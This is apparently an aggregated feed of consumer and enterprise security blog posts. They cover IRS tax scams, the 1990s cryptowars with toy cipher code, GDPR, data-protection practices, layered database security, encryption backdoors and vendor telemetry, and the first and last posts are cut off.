While some of these scams are harder to spot than others, almost all of them can be avoided by understanding the covert routes crooks take to access your family’s data and financial accounts.

According to the IRS, the con games around tax time regularly change. Here are just a few of the recent scams to be aware of:

Erroneous refunds

According to the IRS, schemes are getting more sophisticated. By stealing client data from legitimate tax professionals or buying social security numbers on the black market, a criminal can file a fraudulent tax return. Once the IRS deposits the tax refund into the taxpayer’s account, crooks then use various tactics (phone or email requests) to reclaim the refund from the taxpayer. Multiple versions of this sophisticated scam continue to evolve. If you see suspicious funds in your account or receive a refund check you know is not yours, alert your tax preparer, your bank, and the IRS. To return erroneous refunds, take these steps outlined by the IRS.

Phone scams

If someone calls you claiming to be from the IRS demanding a past due payment in the form of a wire transfer or money order, hang up. Imposters have been known to get aggressive and will even threaten to deport, arrest, or revoke your license if you do not pay the alleged outstanding tax bill.

In a similar scam, thieves call potential victims posing as IRS representatives and tell them that two certified letters were previously sent and returned as undeliverable. The callers then threaten arrest if the victim does not immediately pay through a prepaid debit card. The scammer also tells the victim that the purchase of the card is linked to the Electronic Federal Tax Payment System (EFTPS).

Note: The IRS will never initiate an official tax dispute via phone. If you receive such a call, hang up and report the call to the IRS at 1-800-829-1040.

Robo calls

Baiting you with fear, scammers may also leave urgent “callback” requests through prerecorded robot calls (robo calls), or through a phishing email. Bogus IRS robo calls often politely ask taxpayers to verify their identity over the phone. These robo calls will even alter caller ID numbers to make it look as if the IRS or another official agency is calling.

Phishing schemes

Be on the lookout for emails with links to websites that ask for your personal information. According to the IRS, thieves now send very authentic-looking messages from credible-looking addresses. These emails coax victims into sharing sensitive information or contain links that install malware that collects data.

To protect yourself, stay alert and be wary of any emails from financial groups or government agencies. Don’t share any information online, via email, over the phone, or by text, and don’t click on random links sent to you via email. Once that information is shared anywhere, a crook can steal your identity and use it in different scams.

Human resource/data breaches

In one particular scam crooks target human resource departments. In this scenario, a thief sends an email from a fake organization executive. The email is sent to an employee in the payroll or human resources departments, requesting a list of all employees and their Forms W-2.  This scam is sometimes referred to as business email compromise (BEC) or business email spoofing (BES). 

Using the collected data criminals then attempt to file fraudulent tax returns to claim refunds. Or, they may sell the data on the Internet’s black market sites to others who file fraudulent tax returns or use the names and Social Security Numbers to commit other identity theft related crimes. While you can’t personally avoid this scam, be sure to inquire about your firm’s security practices and try to file your tax return early every year to beat any potentially false filing. Businesses/payroll service providers should file a complaint with the FBI’s Internet Crime Complaint Center (IC3).

As a reminder, the IRS will never:

  • Call to demand immediate payment over the phone, nor will the agency call about taxes owed without first having mailed you several bills.
  • Call or email you to verify your identity by asking for personal and financial information.
  • Demand that you pay taxes without giving you the opportunity to question or appeal the amount they say you owe.
  • Require you to use a specific payment method for your taxes, such as a prepaid debit card.
  • Ask for credit or debit card numbers over the phone or e-mail.
  • Threaten to immediately bring in local police or other law-enforcement groups to have you arrested for not paying.

If you are the victim of identity theft, be sure to take the proper reporting steps. If you receive any unsolicited emails claiming to be from the IRS, report them to the IRS (and then delete the emails).

This post is part II of our series on keeping your family safe during tax time. To read more about helping your teen file his or her first tax return, here’s Part I.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures). 

The post Don’t Get Duped: How to Spot 2018’s Top Tax Scams appeared first on McAfee Blogs.

What Were the CryptoWars?

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.

Crypto in this case refers to cryptography (not crypto-currencies like Bitcoin). Cryptography is a collection of clever ways for you to protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you choose can transform the gobbledegook back to plain English (this process is called decryption).

People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.

However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.
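To see just how simple a substitution cipher really is, here is a toy Python version (purely illustrative; frequency analysis breaks ciphers like this in minutes, which is exactly the point of the paragraph above):

```python
import string

def substitution_encrypt(plaintext: str, key: str) -> str:
    """Encrypt with a simple substitution cipher: each letter of the
    alphabet is replaced by the letter at the same position in `key`.
    Enigma was, at heart, an elaborate machine-driven version of this idea."""
    table = str.maketrans(string.ascii_lowercase, key)
    return plaintext.lower().translate(table)

def substitution_decrypt(ciphertext: str, key: str) -> str:
    """Reverse the substitution using the same shared key."""
    table = str.maketrans(key, string.ascii_lowercase)
    return ciphertext.translate(table)

# A shifted alphabet (the Caesar cipher) is the simplest possible key.
key = string.ascii_lowercase[3:] + string.ascii_lowercase[:3]
secret = substitution_encrypt("attack at dawn", key)
```

Note that the whole scheme depends on the key (and even the method) staying secret, which is exactly the weakness public key cryptography later removed.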

World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.

The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.

In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Shamir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words, the cryptography worked by having a magical secret method known only to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages would become much easier.

This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.
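The trick that made this possible can be seen in the Diffie-Hellman key exchange, one of the foundational results from that body of work. Here is a toy Python demonstration with deliberately tiny numbers; real deployments use parameters thousands of bits long:

```python
def dh_demo():
    """Toy Diffie-Hellman exchange. Everything except `a` and `b`
    can be published openly without compromising the shared secret."""
    p, g = 23, 5            # public modulus and generator
    a, b = 6, 15            # Alice's and Bob's private keys (never sent)
    A = pow(g, a, p)        # Alice publishes A = g^a mod p
    B = pow(g, b, p)        # Bob publishes B = g^b mod p
    # Each side combines the other's public value with its own secret:
    shared_alice = pow(B, a, p)
    shared_bob = pow(A, b, p)
    return shared_alice, shared_bob

# Both sides derive the same secret without it ever crossing the wire.
```

An eavesdropper sees p, g, A, and B, but recovering the secret from those requires solving the discrete logarithm problem, which is infeasible at real key sizes.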

And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.

This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.

But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.

In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.

However, that wasn’t the end of the story. As in so many cases, “justice too long delayed is justice denied”. The internet has only become systematically protected by encryption in the last few years, thanks to the amazing work of LetsEncrypt. We spent almost 20 years sending most of our browsing and search requests via postcard, and the “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack, which puts many systems at risk even today.

Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.

How prepared is your business for the GDPR?

The GDPR is the biggest privacy shake-up since the dawn of the internet, and it is just weeks before it comes into force on 25th May. The GDPR comes with potentially head-spinning financial penalties for businesses found not to be complying, so it really is essential for any business which touches EU citizens' personal data to thoroughly do its privacy rights homework and properly prepare.

Sage have produced a nice GDPR infographic which breaks down the basics of the GDPR with tips on complying, which is shared below.

I am currently writing a comprehensive GDPR Application Developer's Guidance series for IBM developerWorks, which will be released in the coming weeks.

The GDPR: A guide for international business - A Sage Infographic

An Interview by Timecamp on Data Protection

A few months back I was featured in an interview on data protection tips with Timecamp. Only a handful of questions, but they are well articulated for any organisation that wants to be proactive about security, and about its employees' and customers' responsibilities.


How do you evaluate people's awareness regarding the need to protect their private data?

This is an interesting question, as we have often faced challenges during data protection training in how to evaluate with certainty that a person has understood the importance of data security and is not just cramming for the test.

Enterprise security is as much about the people interacting with the systems as about the systems themselves.

One way to perform evaluations is to include surprise checks and discussions within the teams. A team of security-aware individuals is trained and then asked to carry out such inspections. For example, if a laptop is found logged in and unattended for long, the team confiscates it and submits it to a C-level executive (e.g. CIO or COO). As a consultant, I have also worked on an innovative solution that uses such awareness questions as a "second level" check while logging into intranet applications. And we are all aware of phishing campaigns that management can execute on all employees to measure their susceptibility to such emails. But these must be followed up with training on how an individual can detect such an attack, and what they can do to avoid falling prey to such scammers in the future. We must understand that while data protection is vital, awareness training and assessment should not cause speed bumps in a daily schedule.

These awareness checks must be performed regularly without adding much stress for the employee. The more effort they demand, the more likely the employee is to bypass or avoid them. Security teams must work with the employees and support their understanding of data protection. Data protection must be the start of understanding security, not a forced argument.

Do you think that an average user pays enough attention to the issue of data protection?

Data protection is an issue which can only be dealt with through a cumulative effort, and though each one of us cares about privacy, few do so collectively within an enterprise. It is critical to understand that security is a culture, not a product. It needs an ongoing commitment to providing a resilient ecosystem for the business. Social engineering is on the rise, with phishing attacks, USB drops, and fraudulent calls and messages. An employee must understand that a casual approach towards data protection can bring the whole business to ground zero. And the core business must be cautious when it does data identification and classification. The business must discern the scope of its applications and specify the direct and indirect risk if the data gets breached. A data breach is not only an immediate loss of information but a ripple effect leading to disclosure of the enterprise's inner sanctum.

Now, how close are we to achieving this? Unfortunately, we are far from the point where an "average user" accepts data protection as a cornerstone of success in a world where information is the asset. Businesses consider security a tollgate which everyone wants to bypass, because they neither like riding with it nor being assessed by it. Reliable data protection can be achieved when it's not a one-time effort but the base on which we build our technology.

Until we can use the words "security" and "obvious" in the same sentence, positively, it will always be a challenge that the "average user" tries to evade rather than embrace.

Why is the introduction of procedures for the protection of federal information systems and organisations so important?

Policies and procedures are essential for the protection of federal or local information systems, as they harmonise security with usability. We should understand that security is a long road, and when we attempt to protect data, the effort often has quirks which confuse or discourage an enterprise as it evolves. I have witnessed many Fortune 500 firms safeguarding their assets get absorbed into the effort like it's a black hole: they invest millions of dollars and still don't reach par with the scope and requirements. Therefore, it becomes essential to understand the needs of the business, the data it handles, and which procedures apply in its range. Specifically, procedures help keep teams aligned on how to implement a technology or a product for the enterprise. Team experts, or SMEs, usually have telescopic vision in their own domain but a blind eye to the broader defence in depth. Their skills tunnel their view, but a procedure helps them stay in sync with the current security posture and the projected roadmap. A procedure also reduces the probability of error while aligning with a holistic approach towards security: it dictates what to do and how to do it, thereby leaving a minimal margin of misunderstanding in implementing sophisticated security measures.

Are there any automated methods to test the data susceptibility to cyber-attacks, for instance, by the use of frameworks like Metasploit? How reliable are they in comparison to manual audits?

Yes, there are automated methods to perform audits, and to some extent they are well devised to detect low-hanging fruit. In simpler terms, an automated assessment has three key phases: information gathering, tool execution to identify issues, and report review. Security-aware companies, and those that fall under strict regulations, often integrate such tools into their development and staging environments. This continuous integration (CI) keeps the code clean and checks for vulnerabilities and bugs on a regular basis. It also helps smooth out errors that may have crept in through reuse of existing code or outdated functions. On the other side, there are tools which validate the sanity of the production environment and perform regular checks on the infrastructure and data flows.
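As a minimal illustration of the kind of "low-hanging fruit" such tools automate, here is a naive static check written with Python's standard `ast` module. The two patterns flagged are only examples, and real SAST and CI scanners are far more thorough:

```python
import ast

# Naive static analysis sketch: flag calls to risky built-ins and
# hard-coded password strings in Python source. Illustration only;
# real scanners cover hundreds of rules and many languages.

RISKY_CALLS = {"eval", "exec"}

def scan_source(source: str) -> list:
    findings = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        # Calls to risky built-ins like eval()/exec()
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in RISKY_CALLS:
                findings.append(f"line {node.lineno}: call to {node.func.id}()")
        # Assignments such as db_password = "hunter2"
        if isinstance(node, ast.Assign):
            for target in node.targets:
                if (isinstance(target, ast.Name)
                        and "password" in target.id.lower()
                        and isinstance(node.value, ast.Constant)
                        and isinstance(node.value.value, str)):
                    findings.append(f"line {node.lineno}: hard-coded password in {target.id}")
    return findings

sample = 'db_password = "hunter2"\nresult = eval(user_input)\n'
for finding in scan_source(sample):
    print(finding)
```

Wiring a check like this into a CI pipeline means every commit gets the same baseline scrutiny, which is exactly what makes automation good at the routine cases while manual audits handle the rest.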

Are these automated tools enough? No. They are not "smart" enough to replace manual audits.

They can validate configurations & issues in the software, but they can't evolve with the threat landscape. Manual inspections, on the other hand, provide a peripheral vision while verifying the ecosystem resilience. It is essential to have manual audits, and use the feedback to assess, and even further tune the tools. If you are working in a regulated and well-observed domain like finance, health or data collection - the compliance officer would always rely on manual audits for final assurance. The tools are still there to support, but remember, they are as good as they are programmed and configured to do.

How to present procedures preventing attacks in one's company, e.g., to external customers who demand an adequate level of data protection?

This is a paramount concern, and thanks for asking. External clients need to "trust you" before they can share data or plug you into their organisation. The best approach that has worked for me is assurance through what you have, and how well you are prepared for the worst. The cyber world is very fragile; earlier we used to say "if things go bad ..." but now we say "when things go bad ...".

This means we have accepted the fact that an attack is inevitable if we are dealing with data and information. Someone is watching for the chance to strike at the right time, especially if you are a successful firm. Now, assurance can be achieved by demonstrating the policies you have in place for information security and enterprise risk management. These policies must be supplemented with standards which identify the requirements, and with procedures as the how-to documents on the implementation. In most cases, if you have to assure the client of your defence in depth, the security policy, architecture and a previous third-party assessment or audit suffice. In rare cases, a client may ask to perform its own assessment of your infrastructure, which is at your discretion. I would recommend making sure that your policy covers not only security but also incident response, to reflect your preparedness for a breach or attack.

On the other hand, if your end customers want assurance, you can reflect that by being proactive on your product, blog, media etc. about how dedicated you are to securing their data. For example, the kind of authentication you support signals your commitment to protecting the vault. Whether it's mandated or not depends on usability and UI, but supporting it at all shows your commitment to addressing security-aware customers and understanding the need of the hour.

Published with special thanks to Ola Rybacka for this opportunity.

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies" and "Human error can also be ruled out." They went on to say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It just feels too hard, or impossible, at times. And there's some truth to that: there are far too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.
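The masking idea can be sketched in a few lines, assuming Python and invented field names; production masking tools cover many more data types and preserve referential integrity across whole schemas:

```python
import hashlib
import random

# Deterministic masking sketch: replace a sensitive value with a fake
# value in the same format. The seed and field names are hypothetical.

def mask_ssn(ssn: str, seed: str = "masking-key") -> str:
    """Replace an SSN with a fake one that looks and acts real."""
    # Seed a PRNG from the original value so the same input always
    # maps to the same fake output (joins across tables still work).
    rng = random.Random(hashlib.sha256((seed + ssn).encode()).hexdigest())
    return f"{rng.randint(100, 899):03d}-{rng.randint(10, 99):02d}-{rng.randint(1000, 9999):04d}"

record = {"name": "Jane Doe", "ssn": "078-05-1120"}
masked = {**record, "ssn": mask_ssn(record["ssn"])}

# Same input, same mask -- but the original SSN is no longer present.
assert mask_ssn(record["ssn"]) == masked["ssn"]
print(masked)
```

Because the masked value is generated rather than derived reversibly, a copy of the masked database leaks nothing even if it ends up on a public server.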

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).
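The password-hashing half of that advice can be sketched with Python's standard library; the parameters below (salt size, iteration count) are reasonable defaults, not a prescription:

```python
import hashlib
import os

# Application-tier password protection sketch: a salted, deliberately
# slow one-way hash. The plaintext password is never stored, so even a
# fully authorized reader of this field learns nothing useful.

ITERATIONS = 100_000  # slows down offline brute-force attempts

def hash_password(password: str, salt: bytes = None) -> tuple:
    """Return (salt, digest); store both, never the plaintext."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Re-derive the digest from the candidate password and compare."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS) == digest

salt, digest = hash_password("correct horse battery staple")
assert verify_password("correct horse battery staple", salt, digest)
assert not verify_password("wrong guess", salt, digest)
```

Fields that must remain recoverable, like an SSN, would instead use app-layer encryption with a key held outside the database, so a leaked database file alone is not enough to expose them.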

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

Backdoors in messaging apps – what’s really going on?

We are in one of those phases again. The Paris attacks caused, once again, a cascade of demands for more surveillance and weakening of encryption. These demands appear every time, regardless of whether the terrorists used encryption or not.

The perhaps most controversial demand is to make backdoors mandatory in communication software. Encryption technology can be practically unbreakable if implemented right, and the use of encryption has skyrocketed after the Snowden revelations. But encryption is not only used by terrorists. As a matter of fact, it’s one of the foundations we are building our information society on. Protection against cybercrime, authentication of users, securing commerce, maintaining business secrets, protecting the lives of political dissidents, and so on: these are all critical functions that rely on encryption. So encryption is good, not bad. But like any good thing, it can be both used and misused.

And besides that, as people from the Americas prefer to express it: encryption is speech, referring to the First Amendment that grants people free speech. Both encryption technology and encrypted messages can be seen as information that people are free to exchange. Encryption technology is already out there and widely known. How on earth can anyone think that we could get this genie back in the bottle? Banning strongly encrypted messages would just harm ordinary citizens without stopping terrorists from using secure communications, as they are known to disregard laws anyway. Banning encryption as an anti-terror measure would work just as well as simply banning terrorism. (* So can the pro-backdoor politicians really be that stupid and ignorant?

Well, that might not be the whole truth. But let’s first take a look at the big picture. What kind of tools do the surveillance agencies have to fight terrorism, or to spy on their enemies or allies, or anybody else who happens to be of interest? The methods in their toolboxes can roughly be divided into three categories:

  • Tapping the wire. Reading the content of communications this way is becoming futile thanks to extensive use of encryption, but traffic analysis can still reveal who’s communicating with whom. People with unusual traffic patterns may also get attention at this level, despite the encryption.
  • Getting data from service provider’s systems. This usually reveals your network of contacts, and also the contents unless the service uses proper end-to-end encryption. This is where they want the backdoors.
  • Putting spying tools on the suspects’ devices. This can reveal pretty much everything the suspect is doing. But it’s not a scalable method and they must know whom to target before this method can be used.

And their main objectives:

  • Listen in to learn if a suspect really is planning an attack. This requires access to message contents. This is where backdoors are supposed to help, according to the official story.
  • Mapping contact networks starting from a suspect. This requires metadata from the service providers or traffic analysis on the cable.
  • Finding suspects among all network users. This requires traffic analysis on the cable or data mining at the service providers’ end.

So forcing vendors to weaken end-to-end encryption would apparently make it easier to get message contents from the service providers. But as almost everyone understands, a program like this can never be water-tight. Even if the authorities could force companies like Apple, Google and WhatsApp to weaken security, others operating in another jurisdiction will always be able to provide secure solutions. And more skillful gangs could even use their own home-brewed encryption solutions. So what’s the point if we just weaken ordinary citizens’ security and let the criminals keep using strong cryptography? Actually, this is the real goal, even if it isn’t obvious at first.

Separating the interesting targets from the mass is the real goal in this effort. Strong crypto is in itself not the intelligence agencies’ main threat. It’s the trend that makes strong crypto a default in widely used communication apps. This makes it harder to identify the suspects in the first place as they can use the same tools and look no different from ordinary citizens.

Backdoors in the commonly used communication apps would however drive the primary targets towards more secure, or even customized, solutions. These solutions would of course not disappear. But the use of them would not be mainstream, and function as a signal that someone has a need for stronger security. This signal is the main benefit of a mandatory backdoor program.

But it is still not worth it; the price is far too high. Real-world metaphors are often a good way to describe IT issues. Imagine a society where the norm is to leave your home door unlocked. The police walk around checking all doors. They may peek inside to see what you are up to. And those with a locked door must have something to hide, so they are automatically suspects. Does this feel right? Would you like to live in a society like that? This is the IT society some agencies and politicians want.


Safe surfing,


(* Yes, demanding backdoors and banning cryptography is not the same thing. But a backdoor is always a deliberate fault that makes an encryption system weaker. So it’s fair to say that demanding backdoors is equal to banning correctly implemented encryption.

Why Cameron hates WhatsApp so much

It’s a well-known fact that UK’s Prime Minister David Cameron doesn’t care much about peoples’ privacy. Recently he has been driving the so called Snooper’s Charter that would give authorities expanded surveillance powers, which got additional fuel from the Paris attacks.

It is said that terrorists want to tear down Western society and its lifestyle. And Cameron definitely puts himself in the same camp with statements like this:

“In our country, do we want to allow a means of communication between people which we cannot read? No, we must not.”
David Cameron

Note that he didn’t say terrorists, he said people. Kudos for the honesty. It’s a fact that terrorists blend in with the rest of the population, and any attempt to weaken their security affects all of us. And it should be a no-brainer that a nation where the government can listen in on everybody is bad, at least if you have read Orwell’s Nineteen Eighty-Four.

But why does WhatsApp occur over and over as an example of something that gives the snoops grey hair? It’s a mainstream instant messenger app that wasn’t built for security. There are also similar apps that focus on security and privacy, like Telegram, Signal and Wickr. Why isn’t Cameron raging about them?

The answer is both simple and very significant, but it may not be obvious at first. The internet was insecure by default, and you had to use tools to fix that. The pre-Snowden era was the golden age for agencies tapping into the Internet backbone. Everything was open and unencrypted, except the really interesting stuff. Encryption itself became a signal that someone was of interest, and the authorities could use other means to find out what that person was up to.

More and more encryption is being built in by default now that we, thanks to Snowden, know the real state of things. A secured connection between client and server is becoming the norm for communication services. And many services are deploying end-to-end encryption, which means that messages are secured and opened by the communicating devices, not by the servers. Stuff stored on the servers is thus also safe from snoops. So yes, people with Cameron’s mindset have a real problem here. Correctly implemented end-to-end encryption can be next to impossible to break.

But there’s still one important thing that tapping the wire can reveal: which communication tool you are using, and this is the important point. WhatsApp is a mainstream messenger with security. Telegram, Signal and Wickr are security messengers used by only a small group of people with special needs. Traffic from both WhatsApp and Signal, for example, is encrypted. But the fact that you are using Signal is the important point. You stick out, just like encryption users before.

WhatsApp is the prime target of Cameron’s wrath mainly because it is showing us how security will be implemented in the future. We are quickly moving towards a net where security is built in. Everyone will get decent security by default and minding your security will not make you a suspect anymore. And that’s great! We all need protection in a world with escalating cyber criminality.

WhatsApp is by no means a perfect security solution. The implementation of end-to-end encryption started in late 2014 and is still far from complete. The handling of metadata about users and communication is not very secure. And there are tricks the wire-snoops can use to map peoples’ network of contacts. So check it out thoroughly before you start using it for really hot stuff. But they seem to be on the path to become something unique. Among the first communication solutions that are easy to use, popular and secure by default.

Apple’s iMessage is another example. So easy that many are using it without knowing it, when they think they are sending SMS-messages. But iMessage’s security is unfortunately not flawless either.


Safe surfing,


PS. Yes, weakening security IS a bad idea. An excellent example is the TSA luggage locks, that have a master key that *used to be* secret.


Image by Sam Azgor

POLL – Is it OK for security products to collect data from your device?

We have a dilemma, and maybe you want to help us. I have written a lot about privacy and the trust relationship between users and software vendors. Users must trust the vendor to not misuse data that the software handles, but they have very poor abilities to base that trust on any facts. The vendor’s reputation is usually the most tangible thing available.

Vendors can be split into two camps based on their business model. The providers of “free” services, like Facebook and Google, must collect comprehensive data about the users to be able to run targeted marketing. The other camp, where we at F-Secure are, sells products that you pay money for. This camp does not have the need to profile users, so the privacy-threats should be smaller. But is that the whole picture?

No, not really. Vendors of paid products do not have the need to profile users for marketing. But there is still a lot of data on customers’ devices that may be relevant. The devices’ technical configuration is of course relevant when prioritizing maintenance. And knowing what features actually are used helps plan future releases. And we in the security field have additional interests. The prevalence of both clean and malicious files is important, as well as patterns related to malicious attacks. Just to name a few things.

One of our primary goals is to guard your privacy. But we could on the other hand benefit from data on your device. Or to be precise, you could benefit from letting us use that data as it contributes to better protection overall. So that’s our dilemma. How to utilize this data in a way that won’t put your privacy in jeopardy? And how to maintain trust? How to convince you that data we collect really is used to improve your protection?

